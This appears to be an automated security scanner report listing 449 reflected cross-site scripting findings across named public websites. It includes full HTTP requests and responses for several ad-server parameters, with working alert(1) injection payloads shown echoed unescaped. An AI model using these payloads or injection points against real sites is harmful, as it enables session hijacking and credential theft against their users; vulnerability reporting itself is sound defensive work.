1.269. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd [REST URL parameter 2]

1.270. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd [REST URL parameter 3]

1.271. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b [REST URL parameter 1]

1.272. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b [REST URL parameter 2]

1.273. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b [REST URL parameter 3]

1.274. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy [REST URL parameter 1]

1.275. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy [REST URL parameter 2]

1.276. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy [REST URL parameter 3]

1.277. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/ [REST URL parameter 1]

1.278. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/ [REST URL parameter 2]

1.279. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/ [REST URL parameter 3]

1.280. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ [REST URL parameter 1]

1.281. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ [REST URL parameter 2]

1.282. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ [REST URL parameter 3]

1.283. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ [REST URL parameter 4]

1.284. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/ [REST URL parameter 1]

1.285. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/ [REST URL parameter 2]

1.286. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/ [REST URL parameter 3]

1.287. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/ [REST URL parameter 4]

1.288. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ [REST URL parameter 1]

1.289. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ [REST URL parameter 2]

1.290. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ [REST URL parameter 3]

1.291. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ [REST URL parameter 4]

1.292. http://www.nrl.com/News/BillHarrigan/tabid/11005/Default.aspx [name of an arbitrarily supplied request parameter]

1.293. http://www.nrl.com/News/GrahamMurray/tabid/11006/Default.aspx [name of an arbitrarily supplied request parameter]

1.294. http://www.nrl.com/News/LeilaMcKinnon/tabid/11007/Default.aspx [name of an arbitrarily supplied request parameter]

1.295. http://www.nrl.com/News/LiveChat/tabid/11049/Default.aspx [name of an arbitrarily supplied request parameter]

1.296. http://www.nrl.com/News/MattRussell/tabid/11008/Default.aspx [name of an arbitrarily supplied request parameter]

1.297. http://www.nrl.com/News/Moments/tabid/11042/Default.aspx [name of an arbitrarily supplied request parameter]

1.298. http://www.nrl.com/News/PeterSterling/tabid/10993/Default.aspx [name of an arbitrarily supplied request parameter]

1.299. http://www.nrl.com/News/StatsInsider/tabid/11041/Default.aspx [name of an arbitrarily supplied request parameter]

1.300. http://www.nrl.com/News/TrentBarrett/tabid/11009/Default.aspx [name of an arbitrarily supplied request parameter]

1.301. http://www.nrl.com/News/WhereAreTheyNow/tabid/11044/Default.aspx [name of an arbitrarily supplied request parameter]

1.302. http://www.nrl.com/TelstraPremiership/2011Draw/tabid/10978/Default.aspx [name of an arbitrarily supplied request parameter]

1.303. http://www.nrl.com/TelstraPremiership/CasualtyWard/tabid/10247/Default.aspx [name of an arbitrarily supplied request parameter]

1.304. http://www.nrl.com/Video/2011GameAnalyser/tabid/10910/Default.aspx [name of an arbitrarily supplied request parameter]

1.305. http://www.nrl.com/telstrapremiership/gameanalyservideo/tabid/10910/default.aspx [name of an arbitrarily supplied request parameter]

1.306. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/11/playerid/228/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.307. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/11/playerid/692/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.308. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/14/playerid/752/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.309. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/15/playerid/210/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.310. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/6/playerid/336/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.311. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/6/playerid/338/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.312. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/9/playerid/145/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.313. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/9/playerid/32/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.314. http://www.premiermediagroup.com.au/opportunities/current-vacancies/ [REST URL parameter 1]

1.315. http://www.premiermediagroup.com.au/opportunities/current-vacancies/ [REST URL parameter 2]

1.316. http://www.proticket.com.au/event.asp [name of an arbitrarily supplied request parameter]

1.317. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [REST URL parameter 1]

1.318. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBbodystyle parameter]

1.319. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBbodystyle parameter]

1.320. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBmake parameter]

1.321. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBmake parameter]

1.322. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBmodel parameter]

1.323. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBmodel parameter]

1.324. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBprice parameter]

1.325. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SByear parameter]

1.326. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [name of an arbitrarily supplied request parameter]

1.327. http://www.realestateview.com.au/ [name of an arbitrarily supplied request parameter]

1.328. http://www.realestateview.com.au/Real-Estate/Business/Buy.html [REST URL parameter 1]

1.329. http://www.realestateview.com.au/Real-Estate/Business/Buy.html [REST URL parameter 2]

1.330. http://www.realestateview.com.au/Real-Estate/Business/Buy.html [REST URL parameter 3]

1.331. http://www.realestateview.com.au/Real-Estate/Business/Buy.html [name of an arbitrarily supplied request parameter]

1.332. http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html [REST URL parameter 1]

1.333. http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html [REST URL parameter 2]

1.334. http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html [REST URL parameter 3]

1.335. http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html [name of an arbitrarily supplied request parameter]

1.336. http://www.realestateview.com.au/Real-Estate/Residential/Rent.html [REST URL parameter 1]

1.337. http://www.realestateview.com.au/Real-Estate/Residential/Rent.html [REST URL parameter 2]

1.338. http://www.realestateview.com.au/Real-Estate/Residential/Rent.html [REST URL parameter 3]

1.339. http://www.realestateview.com.au/Real-Estate/Residential/Rent.html [name of an arbitrarily supplied request parameter]

1.340. http://www.realestateview.com.au/agents/ [REST URL parameter 1]

1.341. http://www.realestateview.com.au/holiday-rentals [name of an arbitrarily supplied request parameter]

1.342. http://www.realestateview.com.au/propertydata/ [REST URL parameter 1]

1.343. http://www.realestateview.com.au/propertydata/ [name of an arbitrarily supplied request parameter]

1.344. http://www.rkdms.com/redirect [name of an arbitrarily supplied request parameter]

1.345. http://www.scout.com/a.z [c parameter]

1.346. http://www.shutterstock.com/ [name of an arbitrarily supplied request parameter]

1.347. http://www.shutterstock.com/ [name of an arbitrarily supplied request parameter]

1.348. http://www.thefrisky.com/ [name of an arbitrarily supplied request parameter]

1.349. http://www.ticketexchangebyticketmaster.com/NFL/ [name of an arbitrarily supplied request parameter]

1.350. http://www.ticketexchangebyticketmaster.com/NFL/ [partnerCode parameter]

1.351. http://www.ticketexchangebyticketmaster.com/NFL/ [partnercode parameter]

1.352. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx [name of an arbitrarily supplied request parameter]

1.353. http://www.ticketexchangebyticketmaster.com/NFL/eventlist/eventslist.aspx [name of an arbitrarily supplied request parameter]

1.354. http://www.truelocal.com.au/cms/about-us [REST URL parameter 2]

1.355. http://www.truelocal.com.au/cms/about-us [REST URL parameter 2]

1.356. http://www.truelocal.com.au/cms/badges [REST URL parameter 2]

1.357. http://www.truelocal.com.au/cms/badges [REST URL parameter 2]

1.358. http://www.truelocal.com.au/cms/business-centre-products [REST URL parameter 2]

1.359. http://www.truelocal.com.au/cms/business-centre-products [REST URL parameter 2]

1.360. http://www.truelocal.com.au/cms/deals [REST URL parameter 2]

1.361. http://www.truelocal.com.au/cms/deals [REST URL parameter 2]

1.362. http://www.truelocal.com.au/cms/faq [REST URL parameter 2]

1.363. http://www.truelocal.com.au/cms/faq [REST URL parameter 2]

1.364. http://www.truelocal.com.au/cms/faq/ [REST URL parameter 2]

1.365. http://www.truelocal.com.au/cms/faq/ [REST URL parameter 2]

1.366. http://www.truelocal.com.au/cms/get-quotes [REST URL parameter 2]

1.367. http://www.truelocal.com.au/cms/get-quotes [REST URL parameter 2]

1.368. http://www.truelocal.com.au/cms/local-star-reviewer [REST URL parameter 2]

1.369. http://www.truelocal.com.au/cms/local-star-reviewer [REST URL parameter 2]

1.370. http://www.truelocal.com.au/cms/media-centre [REST URL parameter 2]

1.371. http://www.truelocal.com.au/cms/media-centre [REST URL parameter 2]

1.372. http://www.truelocal.com.au/cms/mobile [REST URL parameter 2]

1.373. http://www.truelocal.com.au/cms/mobile [REST URL parameter 2]

1.374. http://www.truelocal.com.au/cms/mobile/ [REST URL parameter 2]

1.375. http://www.truelocal.com.au/cms/mobile/ [REST URL parameter 2]

1.376. http://www.truelocal.com.au/cms/newsletter [REST URL parameter 2]

1.377. http://www.truelocal.com.au/cms/newsletter [REST URL parameter 2]

1.378. http://www.truelocal.com.au/cms/policies [REST URL parameter 2]

1.379. http://www.truelocal.com.au/cms/policies [REST URL parameter 2]

1.380. http://www.truelocal.com.au/cms/privacy-policy [REST URL parameter 2]

1.381. http://www.truelocal.com.au/cms/privacy-policy [REST URL parameter 2]

1.382. http://www.truelocal.com.au/cms/ratings-reviews [REST URL parameter 2]

1.383. http://www.truelocal.com.au/cms/ratings-reviews [REST URL parameter 2]

1.384. http://www.truelocal.com.au/cms/ratings-reviews/ [REST URL parameter 2]

1.385. http://www.truelocal.com.au/cms/ratings-reviews/ [REST URL parameter 2]

1.386. http://www.truelocal.com.au/cms/terms-conditions [REST URL parameter 2]

1.387. http://www.truelocal.com.au/cms/terms-conditions [REST URL parameter 2]

1.388. http://www.truelocal.com.au/map.do [search.location parameter]

1.389. http://www.truelocal.com.au/map.do [search.location parameter]

1.390. http://www.truelocal.com.au/map.do [search.location parameter]

1.391. http://xbox360.ign.com/ [name of an arbitrarily supplied request parameter]

1.392. http://xbox360.ign.com/ [name of an arbitrarily supplied request parameter]

1.393. http://xbox360.ign.com/articles/117/1179415p1.html [name of an arbitrarily supplied request parameter]

1.394. http://xbox360.ign.com/articles/117/1179415p1.html [name of an arbitrarily supplied request parameter]

1.395. http://xbox360.ign.com/articles/119/1193225p1.html [name of an arbitrarily supplied request parameter]

1.396. http://xbox360.ign.com/articles/119/1193225p1.html [name of an arbitrarily supplied request parameter]

1.397. http://xbox360.ign.com/articles/119/1197270p1.html [name of an arbitrarily supplied request parameter]

1.398. http://xbox360.ign.com/articles/119/1197270p1.html [name of an arbitrarily supplied request parameter]

1.399. http://xbox360.ign.com/articles/119/1197452p1.html [name of an arbitrarily supplied request parameter]

1.400. http://xbox360.ign.com/articles/119/1197452p1.html [name of an arbitrarily supplied request parameter]

1.401. http://xbox360.ign.com/articles/119/1197622p1.html [name of an arbitrarily supplied request parameter]

1.402. http://xbox360.ign.com/articles/119/1197622p1.html [name of an arbitrarily supplied request parameter]

1.403. http://xbox360.ign.com/articles/119/1197931p1.html [name of an arbitrarily supplied request parameter]

1.404. http://xbox360.ign.com/articles/119/1197931p1.html [name of an arbitrarily supplied request parameter]

1.405. http://xbox360.ign.com/articles/119/1197937p1.html [name of an arbitrarily supplied request parameter]

1.406. http://xbox360.ign.com/articles/119/1197937p1.html [name of an arbitrarily supplied request parameter]

1.407. http://xbox360.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.408. http://xbox360.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.409. http://xbox360.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.410. http://xbox360.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.411. http://xbox360.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.412. http://xbox360.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.413. http://xbox360.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.414. http://xbox360.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.415. http://xbox360.ign.com/index/latest-updates.html [types parameter]

1.416. http://xbox360.ign.com/index/latest-updates.html [types parameter]

1.417. http://xbox360.ign.com/index/latest-updates.html [types parameter]

1.418. http://xbox360.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.419. http://xbox360.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.420. http://xbox360.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.421. http://xbox360.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.422. http://xbox360.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.423. http://xbox360.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.424. http://xbox360.ign.com/index/top-reviewed.html [name of an arbitrarily supplied request parameter]

1.425. http://xbox360.ign.com/index/top-reviewed.html [name of an arbitrarily supplied request parameter]

1.426. http://xbox360.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

1.427. http://xbox360.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

1.428. http://xbox360.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.429. http://xbox360.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.430. http://xbox360.ign.com/objects/082/082318.html [name of an arbitrarily supplied request parameter]

1.431. http://xbox360.ign.com/objects/082/082318.html [name of an arbitrarily supplied request parameter]

1.432. http://xbox360.ign.com/objects/926/926417.html [name of an arbitrarily supplied request parameter]

1.433. http://xbox360.ign.com/objects/926/926417.html [name of an arbitrarily supplied request parameter]

1.434. http://xboxlive.ign.com/ [name of an arbitrarily supplied request parameter]

1.435. http://xboxlive.ign.com/ [name of an arbitrarily supplied request parameter]

1.436. http://xboxlive.ign.com/articles/119/1197949p1.html [name of an arbitrarily supplied request parameter]

1.437. http://xboxlive.ign.com/articles/119/1197949p1.html [name of an arbitrarily supplied request parameter]

1.438. http://xboxlive.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.439. http://xboxlive.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.440. http://xboxlive.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.441. http://xboxlive.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.442. http://searchportal.information.com/ [Referer HTTP header]

1.443. http://wrapper.askmen.com/a [Referer HTTP header]

1.444. http://wrapper.ign.com/a [Referer HTTP header]

1.445. http://www.shutterstock.com/ [Referer HTTP header]

1.446. http://www.taste.com.au/ [Referer HTTP header]

1.447. http://www.urbanspoon.com/ [Referer HTTP header]

1.448. http://www.urbanspoon.com/ [Referer HTTP header]

1.449. http://seg.sharethis.com/getSegment.php [__stid cookie]



1. Cross-site scripting (reflected)
There are 449 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://1c6e2.v.fwmrm.net/ad/g/1 [asid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the asid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 739f4"%3balert(1)//958107e54a8 was submitted in the asid parameter. This input was echoed as 739f4";alert(1)//958107e54a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&asid=-1739f4"%3balert(1)//958107e54a8&asnw=&caid=&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=753420735476538500&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b117_5659731851959818893";expires=Wed, 03 Oct 2012 20:10:45 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317759045.753420735476538500.544603~664977~687378~,1317759038.438724.273825~,1317759023.649564.253944~254114~254701~254705~254706~327790~327796~,1317759000.438724a2e5761a42d46e2b97deeb32.273825~,1317758999.a2e5761ada6b8f92dade7133.273825~,1317758974.753420735476538500a2e5761ac7192e3688f5cc71.687378~,1317758973.a2e5761a679e207142393da2.687378~,1317758909.470567.295053~295054~,1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,";expires=Thu, 03 Nov 2011 20:10:45 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg127945.1317758965.1317759045.28800.0.0,sg141659.1317753567.1317759045.28800.0.4,sg143516.1317753552.1317759045.28800.0.0,";expires=Thu, 03 Nov 2011 20:10:45 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Thu, 03 Nov 2011 20:10:45 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10447
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:10:44 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
}]}
}]}
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766", pageViewRandom:"753420735476538500", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{id:"-1739f4";alert(1)//958107e54a8", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{_:{
"adSlot":[
{customId:"mrec", _:{
"selectedAds":[
{_:{
"adReferenc
...[SNIP]...

1.2. http://1c6e2.v.fwmrm.net/ad/g/1 [caid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the caid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b3a7"%3balert(1)//99c8bcfbc0b was submitted in the caid parameter. This input was echoed as 4b3a7";alert(1)//99c8bcfbc0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=4b3a7"%3balert(1)//99c8bcfbc0b&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=753420735476538500&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b117_5659731851959818893";expires=Wed, 03 Oct 2012 20:11:09 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g141659~1.1317753705.0,5.1317759053.0,20487.1317759053.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317759023.0,20486.1317756298.0,20487.1317759023.0,20661.1317756142.0,^";expires=Thu, 03 Nov 2011 20:11:09 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317759069.438724.273825~,1317759029.649564a2e5761a53c8824f4df602c.253944~,1317759028.a2e5761a1295382b71812f2c.253944~,1317759000.438724a2e5761a42d46e2b97deeb32.273825~,1317758999.a2e5761ada6b8f92dade7133.273825~,1317758974.753420735476538500a2e5761ac7192e3688f5cc71.687378~,1317758973.a2e5761a679e207142393da2.687378~,1317758909.470567.295053~295054~,1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,";expires=Thu, 03 Nov 2011 20:11:09 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg127945.1317758965.1317759069.28800.0.0,sg141659.1317753567.1317759069.28800.0.4,sg143516.1317753552.1317759069.28800.0.0,";expires=Thu, 03 Nov 2011 20:11:09 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Thu, 03 Nov 2011 20:11:09 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10173
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:11:08 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
]}
}]}
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766", pageViewRandom:"753420735476538500", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{customId:"4b3a7";alert(1)//99c8bcfbc0b", id:"-1", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{_:{
"adSlot":[
{customId:"mrec", _:{
"selectedAds":[
{_:{
"a
...[SNIP]...

1.3. http://1c6e2.v.fwmrm.net/ad/g/1 [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the csid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 441f3"%3balert(1)//f9173373918 was submitted in the csid parameter. This input was echoed as 441f3";alert(1)//f9173373918 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

